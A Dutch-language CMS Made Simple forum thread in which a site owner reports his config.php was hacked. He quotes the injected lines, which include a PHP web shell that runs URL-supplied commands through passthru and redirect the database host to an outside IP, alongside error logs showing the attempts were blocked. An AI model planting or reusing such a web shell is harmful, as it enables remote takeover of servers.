Site config.php gehacked [solved]

Nederlandse ondersteuning voor CMS Made Simple

Moderator: velden

Post Reply
User avatar
Gregor
Power Poster
Power Poster
Posts: 1874
Joined: Thu Mar 23, 2006 9:25 am

Site config.php gehacked [solved]

Post by Gregor »

Wil vanochtend naar mijn site, geen respons. Na enig zoeken kom ik erachter dat op 14 dec. jl. mijn config.php is gewijzigd (rechten staan op 600). Niet begrijpend open ik de file en zie:

Code: Select all

$config['db_hostname'] = '85.10.205.173';
$config['db_username'] = # 'trollface';
$config['db_password'] = # ''.passthru($_GET['command']);exit;//';
$config['db_name'] = # 'trollface';
In de errorlog zie ik:
[14-Dec-2014 19:35:37 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGTextarea() should be compatible with CMSModule::WYSIWYGTextarea($name = 'textarea', $columns = '80', $rows = '15', $encoding = '', $content = '', $stylesheet = '', $addtext = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:35:45 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGGenerateHeader() should be compatible with CMSModule::WYSIWYGGenerateHeader($htmlresult = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:35:45 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGTextarea() should be compatible with CMSModule::WYSIWYGTextarea($name = 'textarea', $columns = '80', $rows = '15', $encoding = '', $content = '', $stylesheet = '', $addtext = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:38:07 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGGenerateHeader() should be compatible with CMSModule::WYSIWYGGenerateHeader($htmlresult = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:38:07 UTC] PHP Strict Standards: Declaration of TinyMCEAdv::WYSIWYGTextarea() should be compatible with CMSModule::WYSIWYGTextarea($name = 'textarea', $columns = '80', $rows = '15', $encoding = '', $content = '', $stylesheet = '', $addtext = '') in /home/efacti/public_html/uisge-beatha.eu/modules/TinyMCEAdv/TinyMCEAdv.module.php on line 469
[14-Dec-2014 19:39:18 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[14-Dec-2014 19:39:21 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[14-Dec-2014 19:39:25 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[14-Dec-2014 19:39:33 UTC] PHP Warning: passthru() has been disabled for security reasons in /home/efacti/public_html/uisge-beatha.eu/config.php on line 12
[1
Dat de passthru wordt tegengehouden is een geluk bij een ongeluk.

Onduidelijk hoe dit heeft kunnen gebeuren.
Last edited by Gregor on Wed Dec 31, 2014 10:52 am, edited 1 time in total.
User avatar
Rolf
Power Poster
Power Poster
Posts: 7825
Joined: Wed Apr 23, 2008 7:53 am
Contact:

Re: Site config.php gehacked

Post by Rolf »

- + - + - + - + - + - + -
LATEST TUTORIAL AT CMS CAN BE SIMPLE:
Migrating Company Directory module to LISE
- + - + - + - + - + - + -
Image
User avatar
Gregor
Power Poster
Power Poster
Posts: 1874
Joined: Thu Mar 23, 2006 9:25 am

Re: Site config.php gehacked

Post by Gregor »

zucht... dank je Rolf!
Post Reply

Return to “Dutch - Nederlands”